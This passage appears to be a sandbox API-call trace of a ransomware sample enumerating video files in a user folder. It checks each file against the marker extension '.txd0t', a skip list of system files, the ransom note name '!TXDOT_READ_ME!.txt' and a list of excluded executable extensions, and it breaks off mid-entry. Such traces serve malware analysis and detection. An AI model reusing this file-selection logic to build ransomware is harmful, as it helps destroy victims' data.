(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0076.927] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.927] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.927] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.927] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.927] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" [0076.927] SetEvent (hEvent=0x3fc) returned 1 [0076.931] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7925b570, ftCreationTime.dwHighDateTime=0x1d5ed62, ftLastAccessTime.dwLowDateTime=0x1620ff10, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x1620ff10, ftLastWriteTime.dwHighDateTime=0x1d5e624, nFileSizeHigh=0x0, nFileSizeLow=0xf21f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I8mA7.swf", cAlternateFileName="")) returned 1 [0076.931] StrCmpW (psz1="I8mA7.swf", psz2=".") returned 1 [0076.931] StrCmpW (psz1="I8mA7.swf", psz2="..") returned 1 [0076.931] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="I8mA7.swf", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" [0076.935] PathFindExtensionW (pszPath="I8mA7.swf") returned=".swf" [0076.935] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="bootsect.bak") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="iconcache.db") returned -1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="thumbs.db") returned -1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2=" ransomware ") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2=" ransom ") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="debug.txt") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="boot.ini") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="desktop.ini") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="autorun.inf") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="ntuser.dat") returned -1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="ntldr") returned -1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="ntdetect.com") returned -1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="bootfont.bin") returned 1 [0076.935] StrCmpIW (psz1="I8mA7.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.935] PathFindExtensionW (pszPath="I8mA7.swf") returned=".swf" [0076.935] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0076.935] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.935] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.935] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.935] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" [0076.936] SetEvent (hEvent=0x3fc) returned 1 [0076.940] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bd7c1d0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xa1909100, ftLastAccessTime.dwHighDateTime=0x1d5f0c4, ftLastWriteTime.dwLowDateTime=0xa1909100, ftLastWriteTime.dwHighDateTime=0x1d5f0c4, nFileSizeHigh=0x0, nFileSizeLow=0x3188, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="iGBmnx.swf", cAlternateFileName="")) returned 1 [0076.944] StrCmpW (psz1="iGBmnx.swf", psz2=".") returned 1 [0076.944] StrCmpW (psz1="iGBmnx.swf", psz2="..") returned 1 [0076.944] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.944] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.944] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="iGBmnx.swf", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" [0076.944] PathFindExtensionW (pszPath="iGBmnx.swf") returned=".swf" [0076.944] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="bootsect.bak") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="iconcache.db") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="thumbs.db") returned -1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2=" ransomware ") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2=" ransom ") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="debug.txt") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="boot.ini") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="desktop.ini") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="autorun.inf") returned 1 [0076.944] StrCmpIW (psz1="iGBmnx.swf", psz2="ntuser.dat") returned -1 [0076.945] StrCmpIW (psz1="iGBmnx.swf", psz2="ntldr") returned -1 [0076.945] StrCmpIW (psz1="iGBmnx.swf", psz2="ntdetect.com") returned -1 [0076.945] StrCmpIW (psz1="iGBmnx.swf", psz2="bootfont.bin") returned 1 [0076.945] StrCmpIW (psz1="iGBmnx.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.945] PathFindExtensionW (pszPath="iGBmnx.swf") returned=".swf" [0076.945] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0076.945] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.945] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.945] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.945] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.945] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" [0076.945] SetEvent (hEvent=0x3fc) returned 1 [0076.947] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b149190, ftCreationTime.dwHighDateTime=0x1d5f129, ftLastAccessTime.dwLowDateTime=0x9bf61aa0, ftLastAccessTime.dwHighDateTime=0x1d5e6f9, ftLastWriteTime.dwLowDateTime=0x9bf61aa0, ftLastWriteTime.dwHighDateTime=0x1d5e6f9, nFileSizeHigh=0x0, nFileSizeLow=0xbbaf, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="IWWrfzZp12CtwW5GR.mkv", cAlternateFileName="IWWRFZ~1.MKV")) returned 1 [0076.953] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2=".") returned 1 [0076.953] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="..") returned 1 [0076.953] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.953] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.953] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="IWWrfzZp12CtwW5GR.mkv", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" [0076.953] PathFindExtensionW (pszPath="IWWrfzZp12CtwW5GR.mkv") returned=".mkv" [0076.953] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="bootsect.bak") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="iconcache.db") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="thumbs.db") returned -1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2=" ransomware ") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2=" ransom ") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="debug.txt") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="boot.ini") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="desktop.ini") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="autorun.inf") returned 1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="ntuser.dat") returned -1 [0076.953] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="ntldr") returned -1 [0076.954] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="ntdetect.com") returned -1 [0076.954] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="bootfont.bin") returned 1 [0076.954] StrCmpIW (psz1="IWWrfzZp12CtwW5GR.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.954] PathFindExtensionW (pszPath="IWWrfzZp12CtwW5GR.mkv") returned=".mkv" [0076.954] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0076.954] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.954] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.954] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.954] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.954] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" [0076.954] SetEvent (hEvent=0x3fc) returned 1 [0076.958] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6ddc5a0, ftCreationTime.dwHighDateTime=0x1d5e765, ftLastAccessTime.dwLowDateTime=0xeaa5be10, ftLastAccessTime.dwHighDateTime=0x1d5e886, ftLastWriteTime.dwLowDateTime=0xeaa5be10, ftLastWriteTime.dwHighDateTime=0x1d5e886, nFileSizeHigh=0x0, nFileSizeLow=0xf333, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LISQrmwmwFkmeV9a6dun.mp4", cAlternateFileName="LISQRM~1.MP4")) returned 1 [0076.958] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2=".") returned 1 [0076.958] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="..") returned 1 [0076.958] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.958] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.958] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="LISQrmwmwFkmeV9a6dun.mp4", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" [0076.958] PathFindExtensionW (pszPath="LISQrmwmwFkmeV9a6dun.mp4") returned=".mp4" [0076.960] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0076.960] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="bootsect.bak") returned 1 [0076.960] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="iconcache.db") returned 1 [0076.960] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="thumbs.db") returned -1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2=" ransomware ") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2=" ransom ") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="debug.txt") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="boot.ini") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="desktop.ini") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="autorun.inf") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="ntuser.dat") returned -1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="ntldr") returned -1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="ntdetect.com") returned -1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="bootfont.bin") returned 1 [0076.963] StrCmpIW (psz1="LISQrmwmwFkmeV9a6dun.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.963] PathFindExtensionW (pszPath="LISQrmwmwFkmeV9a6dun.mp4") returned=".mp4" [0076.964] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0076.964] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.964] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.964] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.964] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.964] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" [0076.964] SetEvent (hEvent=0x3fc) returned 1 [0076.967] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce00c6e0, ftCreationTime.dwHighDateTime=0x1d5e20c, ftLastAccessTime.dwLowDateTime=0x40bd89b0, ftLastAccessTime.dwHighDateTime=0x1d5ebe1, ftLastWriteTime.dwLowDateTime=0x40bd89b0, ftLastWriteTime.dwHighDateTime=0x1d5ebe1, nFileSizeHigh=0x0, nFileSizeLow=0xcbe3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="MTVtI3u5U.mkv", cAlternateFileName="MTVTI3~1.MKV")) returned 1 [0076.968] StrCmpW (psz1="MTVtI3u5U.mkv", psz2=".") returned 1 [0076.972] StrCmpW (psz1="MTVtI3u5U.mkv", psz2="..") returned 1 [0076.972] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.972] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.972] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="MTVtI3u5U.mkv", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" [0076.972] PathFindExtensionW (pszPath="MTVtI3u5U.mkv") returned=".mkv" [0076.972] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="bootsect.bak") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="iconcache.db") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="thumbs.db") returned -1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2=" ransomware ") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2=" ransom ") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="debug.txt") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="boot.ini") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="desktop.ini") returned 1 [0076.972] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="autorun.inf") returned 1 [0076.973] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="ntuser.dat") returned -1 [0076.973] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="ntldr") returned -1 [0076.973] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="ntdetect.com") returned -1 [0076.973] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="bootfont.bin") returned 1 [0076.973] StrCmpIW (psz1="MTVtI3u5U.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.973] PathFindExtensionW (pszPath="MTVtI3u5U.mkv") returned=".mkv" [0076.973] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0076.973] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.973] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.973] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.973] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.973] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" [0076.973] SetEvent (hEvent=0x3fc) returned 1 [0076.978] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7046e160, ftCreationTime.dwHighDateTime=0x1d5ef3b, ftLastAccessTime.dwLowDateTime=0x9d2b7320, ftLastAccessTime.dwHighDateTime=0x1d5e8b6, ftLastWriteTime.dwLowDateTime=0x9d2b7320, ftLastWriteTime.dwHighDateTime=0x1d5e8b6, nFileSizeHigh=0x0, nFileSizeLow=0x35c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mZX-jxKKh.mkv", cAlternateFileName="MZX-JX~1.MKV")) returned 1 [0076.981] StrCmpW (psz1="mZX-jxKKh.mkv", psz2=".") returned 1 [0076.981] StrCmpW (psz1="mZX-jxKKh.mkv", psz2="..") returned 1 [0076.981] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.981] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.981] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="mZX-jxKKh.mkv", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" [0076.981] PathFindExtensionW (pszPath="mZX-jxKKh.mkv") returned=".mkv" [0076.981] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="bootsect.bak") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="iconcache.db") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="thumbs.db") returned -1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2=" ransomware ") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2=" ransom ") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="debug.txt") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="boot.ini") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", 